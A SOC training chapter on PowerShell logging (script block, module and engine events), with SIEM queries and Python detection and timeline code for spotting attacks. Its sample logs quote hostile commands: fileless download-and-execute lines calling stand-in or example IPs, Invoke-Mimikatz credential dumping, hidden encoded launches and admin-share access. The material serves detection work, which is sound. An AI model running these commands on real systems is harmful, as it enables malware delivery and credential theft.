PowerShell Logs

PowerShell is one of the most abused tools by attackers on Windows systems. It gives direct access to .NET, memory, system APIs, remote execution, and scripts — making it ideal for malware, fileless attacks, recon, lateral movement, credential theft, persistence, and payload execution.
Because of this, PowerShell logs are one of the highest-value telemetry sources in the SOC.

This chapter explains PowerShell logging in full, from a practical, attacker-focused angle, with log samples, SIEM queries, and complete investigation workflows.


Why PowerShell Logging Is Critical

Attackers use PowerShell to:

  • Execute encoded payloads

  • Download malware without files

  • Run recon commands (AD enumeration)

  • Dump credentials

  • Install persistence

  • Load in-memory Cobalt Strike beacons

  • Run lateral movement commands

PowerShell logs reveal:

  • Full script contents

  • Encoded command usage

  • Module loading

  • Remote execution

  • Suspicious command chains

  • Credential harvesting scripts

Without PowerShell logging, most modern Windows attacks become invisible.


PowerShell Logging Sources (Complete Breakdown)

1. PowerShell Script Block Logging (Event ID 4104)

Captures full script content, even if obfuscated or encoded.

Example:

EventID=4104
ScriptBlockText: IEX(New-Object Net.WebClient).DownloadString("http://malicious-ip/payload")
CommandPath: powershell.exe
User: DESKTOP\mayur

This directly reveals attacker behavior.


2. PowerShell Event Logging (Event ID 400/403/600)

Logs engine start, command invocation, and pipeline execution.

Examples:

EventID 400 - Engine Start  
EventID 403 - ExecuteCommand  
EventID 600 - Provider Lifecycle Events

Useful for confirming PowerShell activity even if 4104 is disabled.


3. Module Logging (Event ID 4103)

Shows internal PowerShell operations:

  • Loaded modules

  • cmdlets executed

  • Arguments passed

Example:

EventID=4103
CommandInvocation: Get-ADUser -Filter *
Module: ActiveDirectory

Very useful for detecting recon.


4. Windows Security Log (4624/4688 + PowerShell)

Sysmon and Security logs complement PowerShell logs.

Example from Sysmon:

EventID=1
Parent: winword.exe
Process: powershell.exe
CommandLine: powershell -nop -w hidden -enc JAB...

This exposes the macro → PowerShell → payload chain.


PowerShell Log Categories (With Real Examples)

Below is what each PowerShell log captures, with practical attack samples.


1. Script Block Logs (4104) — Most Valuable for SOC

Script block logs capture full or partial script contents.

Example: Encoded Malware Download

EventID 4104
ScriptBlockText:
IEX ((New-Object Net.WebClient).DownloadString('http://185.11.22.10/beacon.ps1'))

Example: Credential Harvesting

EventID 4104
ScriptBlockText:
Invoke-Mimikatz -DumpCreds

Example: Recon Command

Get-ADUser -Filter * -Properties *

These logs expose attacker intent clearly.


2. Engine Start (400) — Detecting Initial Execution

Example:

EventID 400
Message: PowerShell engine started
HostApplication: powershell.exe -nop -w hidden -enc JAB...

Useful for seeing who launched PowerShell and with what arguments.


3. Pipeline Execution (403) — Command-by-Command Tracking

Example:

EventID 403
Command: ConvertTo-SecureString

Pipeline logs reveal every step of a multi-part command.


4. Module Invocation (4103) — Internal Operations

Example:

EventID 4103
CommandInvocation: Get-ADGroupMember
ModuleName: ActiveDirectory

Used heavily for:

  • Internal recon

  • AD enumeration

  • Lateral movement


Detecting Attacker Behavior With PowerShell Logs

Below are the exact patterns SOC analysts detect using PowerShell logs.


1. Encoded Commands (Base64)

Attackers run:

powershell.exe -enc <Base64Payload>

4104 exposes the decoded script.

Log Indicator

ScriptBlockText contains "FromBase64String"

2. Download & Execute (Fileless Malware)

Attacker example:

IEX (New-Object Net.WebClient).DownloadString(...)

This appears in 4104 even if the script never touches disk.


3. Obfuscation Patterns

Look for:

  • -nop (no profile)

  • -w hidden

  • Mixed capitalization (PoWeRsHeLl)

  • String concatenation

  • Char arrays

Example:

$e='IEX';$a='New-Object Net.WebClient'

4104 reveals the reconstructed script.


4. AD Recon / Lateral Movement Prep

Common recon:

Get-ADUser
Get-ADComputer
Get-ADGroup
Get-ADDomain
Get-ADTrust

If a script block shows these cmdlets, the attacker is preparing for lateral movement.


5. PowerShell Remoting (WinRM Attacks)

Logs:

EventID 4104
ScriptBlockText: Invoke-Command -ComputerName SERVER01

Used for:

  • Lateral movement

  • Remote payload execution


6. Credential Dumping

Logs:

EventID 4104
ScriptBlockText: Invoke-Mimikatz

EDR may catch it, but PowerShell logs catch it too.


SIEM Queries for PowerShell Attack Detection

Examples analysts use in Splunk, Elastic, Sentinel, etc.

Detect encoded commands

event.code:4104 AND ScriptBlockText:*enc*

Detect malicious download

ScriptBlockText:*DownloadString*

Detect AD recon

ScriptBlockText:(Get-ADUser OR Get-ADGroup OR Get-ADComputer)

Detect PowerShell launched by Office

process.parent:"winword.exe" AND process.name:"powershell.exe"

Detect privilege abuse

ScriptBlockText:*Invoke-Mimikatz*
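The detection patterns from the sections above and the SIEM queries just listed, implemented as detection logic run over constructed sample events. This is an added example, not code from the chapter; the event field names, the rule names and the EXAMPLE-C2 host are assumptions made for the illustration. The Sysmon command line is decoded the way an analyst would before matching, since the encoded form hides the DownloadString call that 4104 would show in clear.

```python
import base64
import re

# Constructed sample events (not from any real host) in the shapes the chapter shows:
# a Sysmon Event 1 process creation and PowerShell 4104 script blocks.
_ENCODED = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://EXAMPLE-C2/beacon.ps1')".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"event_id": 1, "host": "WS01", "parent": "winword.exe", "process": "powershell.exe", "cmdline": "powershell -nop -w hidden -enc " + _ENCODED},
    {"event_id": 4104, "host": "WS01", "script": "Get-ADUser -Filter * -Properties *"},
    {"event_id": 4104, "host": "WS01", "script": "Invoke-Mimikatz -DumpCreds"},
    {"event_id": 4104, "host": "WS02", "script": "Get-ChildItem C:\\Logs | Measure-Object"},  # benign admin use
]
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# -e, -ec, -enc and -EncodedCommand all take the script as base64 of UTF-16LE text.
ENC_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)
RULES = [  # script-text patterns from the chapter's detection and SIEM sections
    ("download_execute", re.compile(r"DownloadString|DownloadFile", re.I)),
    ("ad_recon", re.compile(r"\bGet-AD(User|Computer|Group|Domain|Trust)\b", re.I)),
    ("credential_dump", re.compile(r"Invoke-Mimikatz", re.I)),
    ("remoting", re.compile(r"Invoke-Command\s+-ComputerName", re.I)),
    ("obfuscation", re.compile(r"FromBase64String|\[char\]", re.I)),
]

def decode_encoded_command(cmdline: str):
    """Return the script hidden behind -enc on a command line, or None if there is none."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def analyze(event: dict) -> list:
    """Return the names of the detections that fire on one event, in rule order."""
    hits = []
    text = event.get("script", "")
    if event["event_id"] == 1:
        cmdline = event.get("cmdline", "")
        if event.get("parent", "").lower() in OFFICE_PARENTS and event.get("process", "").lower() == "powershell.exe":
            hits.append("office_spawned_powershell")
        if re.search(r"-nop\b|-w(?:indowstyle)?\s+hidden", cmdline, re.I):
            hits.append("hidden_or_noprofile")
        decoded = decode_encoded_command(cmdline)
        if decoded is not None:
            hits.append("encoded_command")
            text = decoded  # inspect the decoded script, as a 4104 event would show it
    hits += [name for name, pat in RULES if pat.search(text)]
    return hits
```

Only the first three events fire; the WS02 script block matches nothing, which is the baseline every 4104 rule has to be tuned against.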

Full Attack Timeline Example Using PowerShell Logs

Step 1: User opens malicious Word file

Sysmon:

winword.exe → powershell.exe

Step 2: PowerShell engine starts

Security/PowerShell:

Event 400
HostApplication: powershell.exe -enc ...

Step 3: Script block captured

Event 4104
IEX (New-Object Net.WebClient).DownloadString('http://185.33.21.10/payload')

Step 4: Payload executed

Further script blocks:

Invoke-Mimikatz
Get-ADUser
net use \\server01\c$

Step 5: Lateral movement begins

4624 Logon Type 3 events appear.

Step 6: SIEM Correlates

  • Execution

  • Download

  • Recon

  • Credential access

  • Lateral movement

The SIEM issues a Critical alert.


Analyst Workflow When Investigating PowerShell Activity

  1. Identify parent process

  2. Check for encoded or obfuscated commands

  3. Examine 4104 content

  4. Validate if user normally uses PowerShell

  5. Correlate with Sysmon:

    • Process creation

    • Network connections

  6. Check for signs of recon

  7. Check for signs of persistence

  8. Build timeline

  9. Decide: False Positive or Malicious

  10. Escalate or isolate host

This is the real SOC workflow.
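The correlation in the attack timeline (Steps 1 to 6) and the workflow's "Build timeline" step, as an added example that is not part of the chapter: it tags constructed Sysmon, PowerShell and Security events with a stage, orders them per originating host, and grades the chain the way Step 6 describes. The field names, the hostnames WS01, SERVER01 and WS02, and the EXAMPLE-C2 host are assumptions made for the illustration.

```python
import re
from datetime import datetime
# Constructed events (not from a real host), in the order the chapter's timeline
# shows; field names are simplified versions of what the real EventData carries.
SAMPLE_EVENTS = [
    {"time": "2024-05-01T09:00:01", "host": "WS01", "event_id": 1, "parent": "winword.exe", "process": "powershell.exe"},
    {"time": "2024-05-01T09:00:02", "host": "WS01", "event_id": 400, "host_application": "powershell.exe -enc JAB..."},
    {"time": "2024-05-01T09:00:03", "host": "WS01", "event_id": 4104, "script": "IEX (New-Object Net.WebClient).DownloadString('http://EXAMPLE-C2/payload')"},
    {"time": "2024-05-01T09:01:10", "host": "WS01", "event_id": 4104, "script": "Invoke-Mimikatz"},
    {"time": "2024-05-01T09:01:40", "host": "WS01", "event_id": 4104, "script": "Get-ADUser -Filter *"},
    {"time": "2024-05-01T09:02:05", "host": "SERVER01", "event_id": 4624, "logon_type": 3, "workstation": "WS01"},
    {"time": "2024-05-01T11:30:00", "host": "WS02", "event_id": 4104, "script": "Get-Process | Sort-Object CPU"},
]
OFFICE = ("winword.exe", "excel.exe", "powerpnt.exe")
SCRIPT_STAGES = [  # 4104 script text -> stage, following the chapter's detection sections
    ("download", re.compile(r"DownloadString|DownloadFile", re.I)),
    ("credential_access", re.compile(r"Invoke-Mimikatz", re.I)),
    ("recon", re.compile(r"\bGet-AD\w+", re.I)),
    ("lateral_movement", re.compile(r"Invoke-Command\s+-ComputerName|net use \\\\", re.I)),
]

def stage_of(ev):
    """Return (origin host, stage) for one event, or None when it carries no stage."""
    eid = ev["event_id"]
    if eid == 1 and ev.get("process") == "powershell.exe" and ev.get("parent") in OFFICE:
        return ev["host"], "execution"
    if eid == 400 and "-enc" in ev.get("host_application", ""):
        return ev["host"], "execution"
    if eid == 4104:
        for stage, pat in SCRIPT_STAGES:
            if pat.search(ev["script"]):
                return ev["host"], stage
    if eid == 4624 and ev.get("logon_type") == 3 and ev.get("workstation"):
        # A Type 3 logon is evidence against the workstation it came from, not the target.
        return ev["workstation"], "lateral_movement"
    return None

def build_timelines(events):  # {host: [(datetime, stage), ...]} ordered by time
    timelines = {}
    for ev in sorted(events, key=lambda e: e["time"]):
        tagged = stage_of(ev)
        if tagged:
            timelines.setdefault(tagged[0], []).append((datetime.fromisoformat(ev["time"]), tagged[1]))
    return timelines

def severity(timeline):  # Critical once execution plus three or more later stages are seen
    stages = {s for _, s in timeline}
    if "execution" in stages and len(stages) >= 4:
        return "Critical"
    return "High" if len(stages) >= 2 else "Low"
```

The SERVER01 logon is attributed back to WS01, so the lateral movement lands on the same host timeline as the macro execution, which is what lets the chain reach Critical.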


Intel Dump

  • PowerShell logs come from Script Block Logging (4104), Engine events (400/403), and Module logs (4103).

  • 4104 is critical because it captures full script body, including obfuscated commands.

  • Logs reveal encoded payloads, malware downloads, recon, credential dumping, and lateral movement.

  • Sysmon and Security logs complement PowerShell logs.

  • SIEM detections include encoded commands, suspicious parent processes, recon commands, remote executions, and Mimikatz invocation.

  • PowerShell logs are essential for detecting fileless and memory-based attacks.
